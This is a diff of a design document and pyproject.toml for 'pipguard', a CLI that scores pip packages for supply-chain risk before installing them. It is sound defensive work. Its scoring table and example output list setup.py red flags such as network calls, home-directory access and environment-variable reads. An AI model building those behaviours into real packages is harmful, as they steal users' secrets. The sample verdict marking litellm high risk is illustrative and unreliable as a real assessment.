53
+ | Package < 30 days old | +30 |
54
+ | Home directory access | +30 |
55
+ | Network call in setup.py | +25 |
56
+ | Reads env variables | +20 |
57
+ | Maintainer account < 60 days old | +20 |
58
+ | Download spike (< 50k total only) | +15 |
59
+ | No GitHub repo | +10 |
60
+
61
+ **Context-aware:** same flag scores differently based on trust profile. Network call from a 4-year-old package with 50M downloads weighs less than the same flag from a 2-week-old package. Age and downloads compound.
62
+
63
+ **No static whitelist.** A whitelist creates a blind spot — a compromised boto3 would silently pass. Context-aware scoring + classifier gating handles false positives without a trust bypass.
64
+
65
+ **Configurable weights** via `~/.pipguard/config.toml`. Ships with a `recommended` preset. Warns when user deviates significantly: `"Custom weights active — run pipguard config reset to restore recommended"`.
66
+
67
+ ---
68
+
69
+ ## Classifier-Gated GitHub Calls
70
+
71
+ PyPI classifiers (free — already in the PyPI response) gate whether the GitHub README call is made. GitHub's unauthenticated limit is 60 req/hr — a 20-package scan exhausts it fast without gating.
72
+
73
+ ```
74
+ Pure Python classifiers + network call found → FLAG at full weight, skip GitHub
75
+ Networking / AI / Build Tools classifiers → Fetch GitHub README, discount if intent matches
76
+ No useful classifiers → Fetch GitHub README, default weight if unclear
77
+ ```
78
+
79
+ **Pure Python classifiers:** `Topic :: Utilities`, `Topic :: Text Processing`, `Topic :: Software Development :: Libraries :: Python Modules`
80
+
81
+ **"Network expected" classifiers:** `Topic :: Internet :: WWW/HTTP`, `Topic :: System :: Networking`, `Topic :: Scientific/Engineering :: Artificial Intelligence`, `Topic :: Software Development :: Build Tools`
82
+
83
+ ---
84
+
85
+ ## CLI
86
+
87
+ ```bash
88
+ pipguard install <package> # analyze then install
89
+ pipguard scan # scan requirements.txt
90
+ pipguard scan --ci --fail-on [medium|high] # CI mode, exits 1 on threshold (default: high)
91
+ pipguard info <package> [--no-cache] # report without installing
92
+ pipguard history # past scan results
93
+ pipguard update --force # wipe + refresh CVE cache immediately
94
+ ```
95
+
96
+ **Interception:** uses pip's official plugin API (pip 23.1+), not a shell alias. An alias that crashes locks the developer out of pip entirely. A plugin degrades gracefully.
97
+
98
+ **Example output:**
99
+ ```
100
+ $ pipguard install litellm
101
+
102
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
103
+ TRUST SCORE
104
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
105
+ Package age: 2 months ⚠️
106
+ Maintainer age: 3 weeks 🔴
107
+ Download spike: +380% ⚠️
108
+ Other packages: 0 🔴
109
+ Known vulns: 0 ✅
110
+
111
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
112
+ CODE ANALYSIS (setup.py)
113
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
114
+ Network requests: FOUND 🔴
115
+ Env var access: FOUND 🔴
116
+ Shell execution: NOT FOUND ✅
117
+ Obfuscation: NOT FOUND ✅
118
+
119
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
120
+ VERDICT: 🔴 HIGH RISK (Score: 75)
121
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
122
+ Proceed anyway? [y/N]
123
+ ```
124
+
125
+ ---
126
+
127
+ ## Tech Stack
128
+
129
+ | Component | Choice |
130
+ |-----------|--------|
131
+ | Language | Python (dogfoods itself) |
132
+ | CLI | Typer |
133
+ | HTTP | httpx (API calls + tarball downloads — no requests) |
134
+ | AST | Python `ast` stdlib |
135
+ | Output | Rich |
136
+ | Cache | SQLite stdlib (`~/.pipguard/cache.db`) |
137
+
138
+ **Caching:** trust scores cached 24hr, CVE data 6hr. Shows `(cached)` on hits. `--no-cache` bypasses per-run. `pipguard update --force` wipes CVE cache immediately for zero-day events.
139
+
140
+ **Version pinning:** always checks the exact pinned version from requirements.txt, not latest. Warns on unpinned deps.
141
+
142
+ ---
143
+
144
+ ## Build Order
145
+
146
+ **Week 1 — Core**
147
+ - [ ] CLI skeleton (Typer), PyPI fetch, OSV.dev check, scoring, SQLite cache
148
+
149
+ **Week 2 — Code Analysis**
150
+ - [ ] Tarball download (httpx, version-specific), AST parser, red flag detection, classifier-gated scoring, GitHub README for ambiguous cases
151
+
152
+ **Week 3 — Polish**
153
+ - [ ] Rich output, requirements.txt scan, pip plugin integration, `--ci`/`--fail-on`/`--no-cache`/`--force`, configurable weights + preset warning, README + demo GIF
154
+
155
+ ---
156
+
157
+ ## vs. Existing Tools
158
+
159
+ | Tool | Gap |
160
+ |------|-----|
161
+ | `pip audit` | Only known CVEs — misses new malicious packages |
162
+ | socket.dev | Not a CLI intercept, separate workflow |
163
+ | OSV.dev | Database only, no workflow integration |
164
+ | Dependabot | Reacts after install, not before |
165
+ | **pipguard** | Intercepts at install, combines trust signals + AST analysis |
@@ -0,0 +1,20 @@
1
+ [build-system]
2
+ requires = ["hatchling"]
3
+ build-backend = "hatchling.build"
4
+
5
+ [project]
6
+ name = "pipguard-cli"
7
+ version = "0.1.0"
8
+ description = "Supply chain attack prevention for pip installs"
9
+ requires-python = ">=3.10"
10
+ dependencies = [
11
+ "typer>=0.9.0",
12
+ "httpx>=0.27.0",
13
+ "rich>=13.0.0",
14
+ ]
15
+
16
+ [project.scripts]
17
+ pipguard = "pipguard.main:app"
18
+
19
+ [tool.hatch.build.targets.wheel]
20
+ packages = ["pipguard"]